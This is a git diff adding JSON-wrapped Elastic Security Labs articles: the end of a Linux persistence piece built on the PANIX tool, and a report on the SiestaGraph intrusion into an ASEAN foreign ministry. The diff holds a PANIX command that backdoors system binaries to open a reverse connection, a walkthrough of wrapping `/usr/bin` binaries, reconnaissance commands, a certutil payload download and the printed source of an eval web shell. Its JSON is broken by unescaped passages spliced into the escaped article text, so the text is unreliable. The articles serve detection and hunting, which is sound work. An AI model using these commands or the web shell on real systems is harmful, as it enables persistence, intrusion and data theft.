\"/bin/sh\";'\n# whoami\nroot\n```\n\nLooking at the logs in Discover, we can see the following happening:\n\n\n\nWe can see PANIX being executed with `uid=0` (root), which grants `cap_setuid+ep` (effective and permitted) to `/usr/bin/perl`. Effective indicates that the capability is currently active for the process, while permitted indicates that the capability is allowed to be used by the process. Note that all events with `uid=0` have all effective/permitted capabilities set. After granting this capability and dropping down to user permissions, `perl` is executed and manipulates its own process UID to obtain root access. 
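As a starting point for hunting this behavior yourself, an ES|QL aggregation along the following lines surfaces `setcap` invocations per host. The index pattern and field names are assumptions based on a default Elastic Defend setup, so adjust them to your environment:

```
FROM logs-endpoint.events.process-*
| WHERE event.type == "start" AND process.name == "setcap"
| STATS invocation_count = COUNT(*) BY host.name, process.command_line
| SORT invocation_count ASC
```

Rare or unexpected `setcap` command lines, especially those granting `cap_setuid` to interpreters, are worth investigating.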
Feel free to try out different binaries/permissions.\n\nAs we have quite an extensive list of rules related to process capabilities (for discovery, persistence and privilege escalation activity), we will not list all of them here. Instead, you can take a look at [this blog post](https://www.elastic.co/security-labs/unlocking-power-safely-privilege-escalation-via-linux-process-capabilities), digging deeper into this topic.\n\n### Hunting for persistence through T1548 - process capabilities\n\nHunting for process capability persistence can be done through ES|QL. We can either do a general hunt and find non uid 0 binaries with capabilities set, or hunt for specific potentially dangerous capabilities. To do so, we created the [Process Capability Hunting](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/privilege_escalation_via_process_capabilities.toml) rule.\n\n## T1554 - compromise host software binary: hijacking system binaries\n\nAfter gaining access to a system and, if necessary, escalating privileges to root access, system binary hijacking/wrapping is another option to establish persistence. This method relies on the trust and frequent execution of system binaries by a user. \n\nSystem binaries, located in directories like `/bin`, `/sbin`, `/usr/bin`, and `/usr/sbin` are commonly used by users/administrators to perform basic tasks. Attackers can hijack these system binaries by replacing or backdooring them with malicious counterparts. System binaries that are used often such as `cat`, `ls`, `cp`, `mv`, `less` or `sudo` are perfect candidates, as this mechanism relies on the user executing the binary. \n\nThere are multiple ways to establish persistence through this method. The attacker may manipulate the system’s `$PATH` environment variable to prioritize a malicious binary over the regular system binary. 
Another method would be to replace the real system binary, executing arbitrary malicious code on launch, after which the regular command is executed.\n\nAttackers can be creative in leveraging this technique, as any code can be executed. For example, the system-wide `sudo`/`su` binaries can be backdoored to capture a password every time a user attempts to run a command with `sudo`. Another method can be to establish a reverse connection every time a binary is executed or a backdoor binary is called on each binary execution. As long as the attacker hides well and no errors are presented to the user, this technique is difficult to detect. MITRE does not have a direct reference to this technique, but it probably fits [T1554](https://attack.mitre.org/techniques/T1554/) best.\n\nLet’s take a look at what hijacking system binaries might look like. \n\n### Persistence through T1554 - hijacking system binaries\n\nThe implementation of system binary hijacking in PANIX leverages the wrapping of a system binary to establish a reverse connection to a specified IP. You can reference this [example](https://github.com/Aegrah/PANIX/blob/main/panix.sh#L2391-L2401) or set it up by executing:\n\n```\n> sudo ./panix.sh --system-binary --default --ip 192.168.1.1 --port 2016\n> [+] cat backdoored successfully.\n> [+] ls backdoored successfully.\n```\n\nNow, execute `ls` or `cat` to establish persistence. Let’s analyze the logs. \n\n\n\nIn the figure above we see PANIX executing, moving `/usr/bin/ls` to `/usr/bin/ls.original`. It then backdoors `/usr/bin/ls` to execute arbitrary code, after which it calls `/usr/bin/ls.original` in order to trick the user. Afterwards, we see `bash` setting up the reverse connection. 
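The move-and-wrap pattern itself can be reproduced safely in a scratch directory. The sketch below mimics the steps described above; the file names are illustrative and the payload is a harmless marker:

```shell
# Build a fake "system binary" in a scratch dir, then wrap it PANIX-style
bindir=$(mktemp -d)
printf '#!/bin/sh\necho "original output"\n' > "$bindir/ls"
chmod +x "$bindir/ls"

# Step 1: move the real binary aside
mv "$bindir/ls" "$bindir/ls.original"

# Step 2: drop a wrapper in its place that runs a payload, then hands off
cat > "$bindir/ls" <<EOF
#!/bin/sh
echo "payload ran" >> "$bindir/proof"
exec "$bindir/ls.original" "\$@"
EOF
chmod +x "$bindir/ls"

"$bindir/ls"    # prints "original output"; the proof file records the payload
```

On a real system, the same two steps would target paths like `/usr/bin` (requiring root), with the `exec` hand-off keeping the command's output identical so the user notices nothing.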
The copying/renaming of system binaries and the hijacking of the `sudo` binary are captured in the following detection rules.\n\n| Category | Coverage |\n|----------|-------------------------------|\n| File | [System Binary Moved or Copied](https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_binary_copied_to_suspicious_directory.toml) |\n| | [Potential Sudo Hijacking](https://github.com/elastic/detection-rules/blob/main/rules/linux/privilege_escalation_sudo_hijacking.toml) |\n\n### Hunting for persistence through T1554 - hijacking system binaries\n\nThis activity should be very uncommon, and therefore the detection rules above can be leveraged for hunting. Another way of hunting for this activity could be assembling a list of uncommon binaries to spawn child processes. To aid in this process we created the [Unusual System Binary Parent (Potential System Binary Hijacking Attempt)](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_unusual_system_binary_parent.toml) hunting rule.\n\n## Conclusion\n\nIn this part of our “Linux Detection Engineering” series, we explored more advanced Linux persistence techniques and detection strategies, including init systems, run control scripts, message of the day, udev (rules), package managers, Git, process capabilities, and system binary hijacking. If you missed the previous part on persistence, catch up [here](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms).\n\nWe did not only explain each technique but also demonstrated how to implement them using [PANIX](https://github.com/Aegrah/PANIX). This hands-on approach allowed you to assess detection capabilities in your own security setup. Our discussion included detection and endpoint rule coverage and referenced effective hunting strategies, from ES|QL aggregation queries to live OSQuery hunts.\n\nWe hope you've found this format informative. 
Stay tuned for more insights into Linux detection engineering. Happy hunting!\n"
+ },
+ "title": "Linux Detection Engineering - A Sequel on Persistence Mechanisms",
+ "slug": "sequel-on-persistence-mechanisms",
+ "subtitle": "A walkthrough on how threat actors establish persistence on Linux systems and how to hunt for these techniques.",
+ "date": "2024-08-30",
+ "description": "In this final part of this Linux persistence series, we'll continue exploring persistence mechanisms on Linux systems, focusing on more advanced techniques and how to detect them.",
+ "author": [
+ {
+ "slug": "ruben-groenewoud"
+ }
+ ],
+ "image": "sequel-on-persistence-mechanisms.jpg",
+ "category": [
+ {
+ "slug": "detection-science"
+ }
+ ],
+ "tags": [
+ "linux",
+ "persistence"
+ ]
+ },
+ "id": "security_labs_content-sequel_on_persistence_mechanisms-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-siestagraph_new_implant_uncovered_in_asean_member_foreign_ministry-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-siestagraph_new_implant_uncovered_in_asean_member_foreign_ministry-md.json
new file mode 100644
index 00000000000..372148d6e33
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-siestagraph_new_implant_uncovered_in_asean_member_foreign_ministry-md.json
@@ -0,0 +1,45 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"SiestaGraph: New implant uncovered in ASEAN member foreign ministry\"\nslug: \"siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry\"\ndate: \"2022-12-16\"\nsubtitle: \"Elastic Security Labs is tracking an active intrusion, by likely multiple threat actors, into the Foreign Affairs office of an ASEAN member.\"\ndescription: \"Elastic Security Labs is tracking likely multiple on-net threat actors leveraging Exchange exploits, web shells, and the newly discovered SiestaGraph implant to achieve and maintain access, escalate privilege, and exfiltrate targeted data.\"\nauthor:\n - slug: samir-bousseaden\n - slug: andrew-pease\n - slug: daniel-stepanic\n - slug: salim-bitam\n - slug: seth-goodwin\n - slug: devon-kerr\nimage: \"photo-edited09.jpg\"\ncategory:\n - slug: attack-pattern\ntags:\n - ref2924\n - siestagraph\n - doorme\n---\n\n## Key takeaways\n\n- Likely multiple threat actors are accessing and performing live on-net operations against the Foreign Affairs Office of an ASEAN member using a likely vulnerable, and internet-connected, Microsoft Exchange server. 
Once access was achieved and secured, the mailboxes of targeted individuals were exported.\n- Threat actors deployed a custom malware backdoor that leverages the Microsoft Graph API for command and control, which we’re naming SiestaGraph.\n- A modified version of an IIS backdoor called DoorMe was leveraged with new functionality to allocate shellcode and load additional implants.\n\n## Preamble\n\nIn early December, Elastic Security Labs observed PowerShell commands used to collect and export mailboxes from an internet-connected Microsoft Exchange server for the Foreign Affairs Office of an Association of Southeast Asian Nations (ASEAN) member.\n\nIn spite of diverse security instrumentation observed during this activity, the threat actors were able to achieve:\n\n- Execution of malware on Exchange Servers, Domain Controllers, and workstations\n- Exfiltration of targeted user and group mailboxes\n- Deployment of web shells\n- Lateral movement to user workstations\n- Internal reconnaissance\n- Collection of Windows credentials\n\nBecause the intrusion is ongoing and covers almost the entire MITRE ATT&CK framework, the analysis sections will use a timeline approach.\n\n> For a deep-dive analysis of the SIESTAGRAPH, DOORME, or SHADOWPAD malware families, check out our [follow-on publication](https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns) that covers those in detail. In addition, there are associations between this campaign and others based on other observations and third-party reporting.\n>\n> _Updated: 2/2/2023_\n\n## Analysis\n\nThe investigation, which we’re tracking as REF2924, began with the execution of a PowerShell command used to export a user mailbox. 
While this is a normal administrative function, the commands were executed with a process ancestry starting with the IIS Worker Process ( **w3wp.exe** ) as a parent process of **cmd.exe** , and **cmd.exe** executing Powershell.\n\nThese events started the investigation that later identified multiple threat actors within the contested network environment.\n\nThe first events observed from this cluster of activity were on November 26, 2022, with the detection of a malicious file execution on a Domain Controller. Because of this, it is likely [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) was deployed post-initial compromise, and in “Detect” mode. Throughout our analysis, we observed other security instrumentation tools in the environment, indicating the victim was aware of the intrusion and trying to evict the threat actors.\n\nBecause of the multiple malware samples achieving similar goals, various DLL sideloading observations, and the presence of a likely internet-connected Exchange server, we believe that there are multiple threat actors or threat groups working independently or in tandem with each other.\n\n### November 26–30, 2022\n\n#### Malware execution\n\nThe earliest known evidence of compromise occurred on November 26, 2022, with the execution of a file called **OfficeClient.exe** from **C:\\ProgramData\\Microsoft** on a Domain Controller.\n\nTen minutes after **OfficeClient.exe** was executed on the Domain Controller, another malicious file was executed on another Windows 2019 server. This file was called **Officeclient.exe** and executed from **c:\\windows\\pla**. 
On November 28, 2022, **officeup.exe** was executed on this same Windows 2019 server from **C:\\programdata**.\n\nOn November 29, 2022, the **OfficeClient.exe** file was executed on an Exchange server as **C:\\ProgramData\\OfficeCore.exe**.\n\nAll three of these files ( **OfficeClient.exe** , **Officeclient.exe** , and **OfficeCore.exe** ) have an original PE file name of **windowss.exe** , which is the file name assigned at compile time. We are naming this malware family “SiestaGraph” because of the long sleep timer and the way that the malware uses the Microsoft Graph API for command and control.\n\nAs of December 8, 2022, we observed a variant of SiestaGraph in [VirusTotal](https://www.virustotal.com/gui/file/50c2f1bb99d742d8ae0ad7c049362b0e62d2d219b610dcf25ba50c303ccfef54), uploaded from the Netherlands on October 14, 2022. SiestaGraph makes use of a .NET API [library](https://github.com/KoenZomers/OneDriveAPI) that functions as an alternative to using Microsoft Graph, an API for interacting with the Microsoft cloud, including Microsoft 365, Windows, and Enterprise Mobility + Security.\n\n#### Internal reconnaissance\n\nOn November 28, 2022, the threat actor began performing internal reconnaissance by issuing standard commands such as **whoami** , **hostname** , **tasklist** , etc. 
These commands were executed with a process ancestry starting with the IIS Worker Process ( **w3wp.exe** ) as a parent process of **cmd.exe** , and **cmd.exe** executing the commands.\n\n```\ncmd.exe /c cd /d C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\"&whoami\n\ncmd.exe /c cd /d C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\"&hostname\n\ncmd.exe /c cd /d C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\"&tasklist\n```\n\nAdditional adversary reconnaissance was performed to enumerate local network assets as well as victim assets at embassies and consulates abroad. There has been no indication that this information has been subsequently exploited for additional access or information at this time.\n\nOn November 29, 2022, the threat actor began collecting domain user and group information with the **net user** and **net group** commands, again issued as child processes of **w3wp.exe** and **cmd.exe**. These commands confirmed that this was not an entirely scripted campaign and that an active operator was involved: the operator forgot to add the **/domain** syntax to two of the 20 **net user** commands. While the **net user** command does not require the **/domain** syntax, the fact that it was missing from only two of the 20 occurrences makes an operator oversight likely. This was the first of multiple typographical errors observed throughout this campaign.\n\n\n\n#### Exporting Exchange mailboxes\n\nOn November 28, 2022, the threat actor started to export user mailboxes, again using the **w3wp.exe** process as a parent for **cmd.exe** , and finally Powershell. The threat actor added the **Microsoft.Exchange.Management.PowerShell.SnapIn** module. 
This module provides the ability to manage Exchange functions using Powershell and was used to export the mailboxes of targeted Foreign Service Officers, saving them as PST files.\n\n\n\nIn the above example, the **Received -gt** and **Sent -gt** dates timebox the collection window as all emails sent and received after ( **gt** is shorthand for “greater than”) November 15, 2022. The timeboxing was not uniform across all mailboxes, and this process was repeated multiple times. Again, in the above example from November 28, 2022, the timebox was for all sent and received emails from November 15, 2022, to the current date (November 28, 2022); on December 6, 2022, the mailbox was exported again, this time with a **gt** value of November 28, 2022, which was the date of the last export.\n\nIn another example in this phase, the threat actors targeted a mailbox called **csirt**. While this is unconfirmed, “csirt” is commonly an acronym for Cyber Security Incident Response Team.\n\n\n\nTaking into consideration the timebox used on the **csirt** export, if this is the industry-standard CSIRT acronym, the intrusion could have started as early as September 1, 2022, with the threat actors monitoring the CSIRT to determine if their intrusion had been detected.\n\nThroughout this phase, a total of 24 mailboxes were exported.\n\nOnce the mailboxes were exported, the threat actor created a 7zip archive called **7.tmp** with a password of **huebfkaudfbaksidfabsdf**.\n\n\n\nThree of the mailboxes, one of which was the **csirt** mailbox, were archived individually. 
These three mailboxes were archived with a **.log.rar** or **.log** file extension.\n\n\n\nFinally, the threat actor created a 7zip archive called **o.7z** , split into 200MB volumes, and added the previously created, password-protected **7.tmp** archive to it.\n\n\n\n#### IIS backdoor module\n\nOn November 28, 2022, we observed the loading of two DLL files, **Microsoft.Exchange.Entities.Content.dll** and **iisrehv.dll** , through the execution of the **iissvcs** service using **svchost.exe**. Both **Microsoft.Exchange.Entities.Content.dll** and **iisrehv.dll** were loaded using the **iissvcs** module of the Windows Service Host through the execution of **C:\\Windows\\system32\\svchost.exe -k iissvcs**. These malicious IIS modules are loosely based on the [DoorMe](https://malpedia.caad.fkie.fraunhofer.de/details/win.doorme) IIS backdoor.\n\n\n\n> For context, IIS is web server software developed by Microsoft and used within the Windows ecosystem to host websites and server-side applications. Starting with version 7.0, Microsoft extended IIS by adding a modular architecture that allows individual modules to be added or removed in order to achieve functionality depending on an environment’s needs. These modules represent individual features that the server can then use to process incoming requests.\n\nDuring the post-compromise stage, the adversary used the malicious IIS module as a passive backdoor monitoring all incoming HTTP requests. When it receives a tailor-made request from the operator, the malware activates and processes commands. This approach can be challenging for organizations as there is usually low visibility in terms of monitoring and a lack of prevention capabilities on these types of endpoints. 
In order to install this backdoor, administrator rights are required and the module must be placed inside the **%windir%\\System32\\inetsrv** directory. Based on the observed artifacts, we believe initial access was gained through server exploitation during a recent wave of Microsoft Exchange RCE exploit usage.\n\nThe malicious module (C++ DLL) is first loaded through its export, [RegisterModule](https://learn.microsoft.com/en-us/previous-versions/iis/smooth-streaming-client/pfn-registermodule-function). This function is responsible for setting up the event handler methods and dynamically resolving API libraries for future usage. The main functionality of the backdoor is implemented using the [CGlobalModule class](https://learn.microsoft.com/en-us/previous-versions/iis/smooth-streaming-client/cglobalmodule-class) under the event handler [OnGlobalPreBeginRequest](https://learn.microsoft.com/en-us/previous-versions/iis/smooth-streaming-client/cglobalmodule-onglobalprebeginrequest-method). By overriding this event handler, the malware is loaded before a request enters the pipeline. All of the backdoor’s core functionality exists in this function, including cookie validation, parsing commands, and calling underlying command functions.\n\n\n\nThe malware implements an authentication mechanism based on a specific cookie name that contains the authentication key. This malicious IIS module checks every incoming HTTP request for the specified cookie name, and it returns a success message in case of a GET request. The GET request is used as a way for the operator to test the backdoor’s status, and it also returns the username and hostname of the impacted machine. Commands can be passed to the backdoor through POST requests as data.\n\n\n\nThroughout our analysis, we discovered old samples on VirusTotal related to this backdoor. Although they have the same authentication and logic, they implement different functionalities. 
The cookie name used for authentication was also changed alongside the handled commands.\n\nThis observed backdoor implements four different commands, and a pipe symbol is used to separate the command ID from its arguments.\n\n| ID | Parameter | Description |\n| ---- | ----------------------------------- | --------------------------------------------------------------------------------------------------------------- |\n| 0x42 | Expects the string GenBeaconOptions | Generates a Globally Unique Identifier (GUID) used to identify the infected machine and sends it to the attacker |\n| 0x43 | Shellcode blob | Executes the shellcode blob passed as a parameter in the current process |\n| 0x44 | N/A | Writes to and reads from a specified named pipe |\n| 0x63 | Shellcode blob in chunks | Similar to command ID 0x43, but this command receives the blob of shellcode in chunks and executes it when fully received |\n\nFrom our analysis, it appears that this simplistic backdoor is used as a stage loader. It uses native Windows NT APIs, mainly **NtAllocateVirtualMemory** , **NtProtectVirtualMemory** , and **NtCreateThreadEx** , to allocate the required shellcode memory and to create the executing thread.\n\n#### kk2.exe\n\nOn November 30, 2022, an unknown binary called **kk2.exe** was executed on an Exchange server. While we have been unable to collect **kk2.exe** as of this writing, we can see that it was used to load **mhyprot.sys** , a vulnerable driver that can be used to monitor and terminate processes from kernel mode. 
It is unclear if **mhyprot.sys** is downloaded by, or embedded into, **kk2.exe**.\n\n\n\n**mhyprot.sys** was detected by Elastic’s openly published [Windows.VulnDriver.Mhyprot YARA rule](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_VulnDriver_Mhyprot.yar), released in August 2022.\n\n> For more information on how vulnerable drivers are used for intrusions, check out the [Stopping Vulnerable Driver Attacks](https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks) research Joe Desimone published in September 2022.\n\nAs stated previously, we could not collect **kk2.exe** for analysis, but it is likely that it used **mhyprot.sys** to escalate to kernel mode as a way to monitor, and if necessary, terminate processes. This could be used as a way of protecting an implant, or the entire intrusion, from detection.\n\n#### Web shells\n\nThe following section highlights multiple attempts by the threat actors to install a web shell as a backdoor into the environment in case they are evicted. While speculative in nature, it appears that most of these attempts to load web shells failed. It is unclear what the reasons for the failures are. We won’t cover every attempt at loading a web shell, as several of them were very similar, but we’ll highlight the shifts in approaches.\n\nThe first attempt was to use the Microsoft **certutil** tool to download an Active Server Pages (ASPX) file ( **config.aspx** ) from a remote host (**185.239.70[.]229**) and save it as the **error.aspx** page on the Exchange Control Panel’s webserver. 
Because this IP address is a [known](https://threatfox.abuse.ch/ioc/1023850/) Cobalt Strike server, it may have been blocked by network defense architecture, leading to further attempts to overwrite **error.aspx**.\n\n\n\nAfter attempting to use **config.aspx** from a Cobalt Strike C2 server, the threat actors attempted to insert Base64-encoded Javascript into a text file ( **1.txt** ), use **certutil** to decode the Base64-encoded Javascript ( **2.aspx** ), and then overwrite **error.aspx** with **2.aspx**. This was attempted on both the Exchange Control Panel and Outlook Web Access web servers.\n\n\n\nThe Base64-encoded string decoded into the following JScript:\n\n```\n<%@ Page Language=\"Jscript\" Debug=true%>\n<%\nvar TNKY='nHsXLMPUSCABolxOgKWuIFeGVimhEjyzQrTvRcwafZdJDktqYpbN';\nvar ZZXG=Request.Form(\"daad\");\nvar VAXN=TNKY(7) + TNKY(0) + TNKY(2) + TNKY(10) + TNKY(21) + TNKY(22);\neval(ZZXG, VAXN);\n%>\n```\n\nThe preceding code is a simple web shell leveraging the JScript **eval** method to evaluate JScript code sent through the POST parameter **daad**. Variations of this technique were attempted multiple times. Other attempts were observed to load [obfuscated versions](https://github.com/ysrc/webshell-sample/blob/master/aspx/54a5620d4ea42e41beac08d8b1240b642dd6fd7c.aspx#L11) of the [China Chopper](https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper) and [Godzilla](https://malpedia.caad.fkie.fraunhofer.de/details/jsp.godzilla_webshell) [web shells](https://github.com/tennc/webshell/blob/master/Godzilla/123.ashx).\n\n### December 1–4, 2022\n\n#### DLL side-loading\n\nOn December 2, 2022, on two Domain Controllers, we observed a new DLL ( **log.dll** ) being side-loaded by a legitimate, but 11-year-old, version of the Bitdefender Crash Handler executable (compiled name: **BDReinit.exe** ), **13802 AR.exe**. 
Once executed, it will move to the **C:\\ProgramData\\OfficeDriver** directory, rename itself **svchost.exe** , and install itself as a service.\n\nOnce **log.dll** is loaded, it spawns the Microsoft Windows Media Player ( **wmplayer.exe** ) and **dllhost.exe** and injects into them, which triggers a memory shellcode detection.\n\n_Updated 2/2/2023: In our_ [_updated research into SIESTAGRAPH, DOORME, and SHADOWPAD_](https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns)_, we identify_ _ **log.dll** _ _as part of the SHADOWPAD malware family._\n\nOn December 2, 2022, another unknown DLL, **Loader.any** , was interactively executed with an Administrative account using **rundll32.exe**. **Loader.any** was observed executing twice on a Domain Controller and was then deleted interactively.\n\nOn December 3, 2022, we observed another malicious file, **APerfectDayBase.dll**. While this is a known malicious file, its execution was not observed. **APerfectDayBase.dll** is the legitimate name of a DLL in the import table of a benign-looking program, **AlarmClock.exe**.\n\n\n\nThis naming appears to be an attempt to make the malicious DLL look legitimate, likely so that **AlarmClock.exe** could be leveraged as a side-loading target. Testing has confirmed that the DLL can be side-loaded with **AlarmClock.exe**. While not malicious, we are including the hash for **AlarmClock.exe** in the Indicators table, as it could be present purely as a side-loading vehicle for the malicious DLL, **APerfectDayBase.dll**.\n\n## Victimology and targeting motivations\n\n### Diamond model\n\nElastic Security utilizes the [Diamond Model](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf) to describe high-level relationships between the adversaries, capabilities, infrastructure, and victims of intrusions. 
While the Diamond Model is most commonly used with single intrusions, leveraging Activity Threading (section 8) as a way to create relationships between incidents, an adversary-centered (section 7.1.4) approach allows for a single, albeit cluttered, diamond.\n\n\n\n### Victimology\n\nThe victim is the foreign ministry of a nation in Southeast Asia. The threat actor appeared to focus priority intelligence collection efforts on personnel and positions of authority related to the victim's relationship with [ASEAN](https://asean.org/what-we-do) (Association of Southeast Asian Nations).\n\nASEAN is a regional partnership union founded in 1967 to promote intergovernmental cooperation among member states. This has been expressed through economic, security, trade, and educational cooperation with expanding international and domestic significance for partner nations. The union itself has expanded to 10 member countries with 2 more currently seeking accession. It is exerting this international influence over the development of a [Regional Comprehensive Economic Partnership](https://rcepsec.org/about/) trade agreement with a broader periphery of member nations (16 members and 2 applicants).\n\n\n\nBelow is a list of the targeted users, the collection window(s) in which their mailboxes were exported, and the date their mailboxes were exported.\n\n| User | Collection Window | Collection Date(s) |\n| ------- | --------------------------------------------- | ------------------- |\n| User 1 | 11/1/2022 - 11/28/2022, 11/29/2022 - 12/6/2022 | 11/28/2022, 12/6/2022 |\n| User 2 | 11/1/2022 - 11/28/2022 | 11/28/2022 |\n| User 3 | 11/1/2022 - 11/28/2022 | 11/28/2022 |\n| User 4 | 11/15/2022 - 11/28/2022 | 11/28/2022 |\n| User 5 | 11/15/2022 - 11/28/2022, 11/29/2022 - 12/6/2022 | 11/28/2022, 12/6/2022 |\n| User 6 | 11/15/2022 - 11/28/2022 | 11/28/2022 |\n| User 7 | 11/15/2022 - 11/28/2022, 11/29/2022 - 12/6/2022 | 11/28/2022, 12/6/2022 |\n| User 8 | 11/15/2022 - 11/28/2022 | 11/28/2022 |\n| 
User 9 | 11/15/2022 - 11/28/2022 | 11/28/2022 |\n| User 10 | 9/15/2022 - 11/29/2022 | 11/29/2022 |\n| User 11 | 9/15/2022 - 11/29/2022 | 11/29/2022 |\n| User 12 | 9/15/2022 - 11/29/2022 | 11/29/2022 |\n| User 13 | 9/1/2022 - 11/30/2022 | 11/30/2022 |\n| User 14 | 9/1/2022 - 11/30/2022 | 11/30/2022 |\n| User 15 | 11/29/2022 - 12/6/2022 | 12/6/2022 |\n| User 16 | 11/29/2022 - 12/6/2022 | 12/6/2022 |\n| User 17 | 11/29/2022 - 12/6/2022 | 12/6/2022 |\n| User 18 | 11/29/2022 - 12/6/2022 | 12/6/2022 |\n| User 19 | 11/29/2022 - 12/6/2022 | 12/6/2022 |\n| User 20 | 11/29/2022 - 12/6/2022 | 12/6/2022 |\n| User 21 | 11/29/2022 - 12/6/2022 | 12/6/2022 |\n| User 22 | 11/29/2022 - 12/6/2022 | 12/6/2022 |\n| User 23 | 11/29/2022 - 12/6/2022 | 12/6/2022 |\n| User 24 | 11/29/2022 - 12/6/2022 | 12/6/2022 |\n\nAs reflected above, we observed Users 1, 5, and 7 targeted twice each, indicating that the contents of their mailboxes were of particular interest. This could be the result of pre-intrusion reconnaissance, or the threat actor may have decided to continue collecting on those users after reviewing the initial tranche of mailboxes.\n\n### Targeting motivation\n\nThere is no indication this victim would provide any direct monetary benefit to an adversary. The attack appears to be motivated by diplomatic intelligence gathering. There are a number of potential adversaries who would find a nation’s confidential diplomatic communications related to ASEAN, and by extension the RCEP, to be highly advantageous in furthering their own regional influence, national security, and domestic goals.\n\nIf the threat actor is excluded from ASEAN trade unions and depends on foreign aid from members of those trade unions, it could find confidential diplomatic information specifically related to ASEAN useful for negotiating or renegotiating trade agreements.\n\nASEAN member nations are rival claimants to territorial disputes in the South China Sea (SCS). 
ASEAN as an organization has not produced a unified front in the SCS dispute, with some members preferring direct nation-to-nation negotiations and some wanting ASEAN to negotiate as a whole. Diplomatic information from ASEAN member nations might provide the threat actor with useful information to influence decisions and negotiations around the SCS. The threat actor's interest in ASEAN and any individual member would almost certainly be multifaceted covering government functions from immigration to agriculture, to technology, to sociopolitical considerations such as human rights.\n\n## Detection logic\n\n### Prevention rules\n\n- [Potential Masquerading as SVCHOST](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_masquerading_as_svchost.toml)\n- [Binary Masquerading via Untrusted Path](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_binary_masquerading_via_untrusted_path.toml)\n- [Process Execution from an Unusual Directory](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_binary_masquerading_via_untrusted_path.toml)\n\n### Detection rules\n\n- [Potential Credential Access via DCSync](https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_dcsync_replication_rights.toml)\n- [Windows Service Installed via an Unusual Client](https://github.com/elastic/detection-rules/blob/main/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml)\n- [Suspicious Microsoft IIS Worker Descendant](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_suspicious_microsoft_iis_worker_descendant.toml)\n- [Encrypting Files with WinRar or 7z](https://github.com/elastic/detection-rules/blob/main/rules/windows/collection_winrar_encryption.toml)\n- [Exporting Exchange Mailbox via 
PowerShell](https://github.com/elastic/detection-rules/blob/main/rules/windows/collection_email_powershell_exchange_mailbox.toml)\n- [Windows Network Enumeration](https://github.com/elastic/detection-rules/blob/main/rules/windows/discovery_net_view.toml)\n- [NTDS or SAM Database File Copied](https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml)\n- [Suspicious CertUtil Commands](https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_suspicious_certutil_commands.toml)\n\n### Hunting queries\n\nThe events for both KQL and EQL are provided with the Elastic Agent using the Elastic Defend integration. Hunting queries can return a high volume of signals or false positives. These queries are used to identify potentially suspicious behavior, but an investigation is required to validate the findings.\n\n#### KQL query\n\nUsing the Discover app in Kibana, the below query will identify loaded IIS modules that have been identified as malicious by Elastic Defend (even if Elastic Defend is in “Detect Only” mode).\n\nThe leading and trailing wildcards (\\*) can make this an expensive search over a large number of events.\n\n```\nevent.code : \"malicious_file\" and event.action : \"load\" and process.name : \"w3wp.exe\" and process.command_line.wildcard : (*MSExchange* or *SharePoint*)\n```\n\n#### EQL queries\n\nUsing the Timeline section of the Security Solution in Kibana under the “Correlation” tab, you can use the below EQL queries to hunt for behaviors similar to the SiestaGraph backdoor and the observed DLL side-loading patterns.\n\n```\n# Hunt for DLL Sideloading using the observed DLLs:\n\nlibrary where\n dll.code_signature.exists == false and\n process.code_signature.trusted == true and\n dll.name : (\"log.dll\", \"APerfectDayBase.dll\") and\n process.executable :\n (\"?:\\\\Windows\\\\Tasks\\\\*\",\n \"?:\\\\Users\\\\*\",\n \"?:\\\\ProgramData\\\\*\")\n\n# Hunt for scheduled task or service 
from a suspicious path:\n\nprocess where event.type == \"start\" and\n process.executable : (\"?:\\\\Windows\\\\Tasks\\\\*\", \"?:\\\\Users\\\\Public\\\\*\", \"?:\\\\ProgramData\\\\Microsoft\\\\*\") and\n (process.parent.args : \"Schedule\" or process.parent.name : \"services.exe\")\n\n# Hunt for the SiestaGraph compiled file name and running as a scheduled task:\n\nprocess where event.type == \"start\" and\n process.pe.original_file_name : \"windowss.exe\" and not process.name : \"windowss.exe\" and process.parent.args : \"Schedule\"\n\n# Hunt for unsigned executable using Microsoft Graph API:\n\nnetwork where event.action == \"lookup_result\" and\n dns.question.name : \"graph.microsoft.com\" and process.code_signature.exists == false\n```\n\n### YARA\n\nElastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the [SiestaGraph malware implant](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_SiestaGraph.yar) and the [DoorMe IIS backdoor](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_DoorMe.yar).\n\n```\nrule Windows_Trojan_DoorMe {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2022-12-09\"\n last_modified = \"2022-12-15\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"DoorMe\"\n threat_name = \"Windows.Trojan.DoorMe\"\n reference_sample 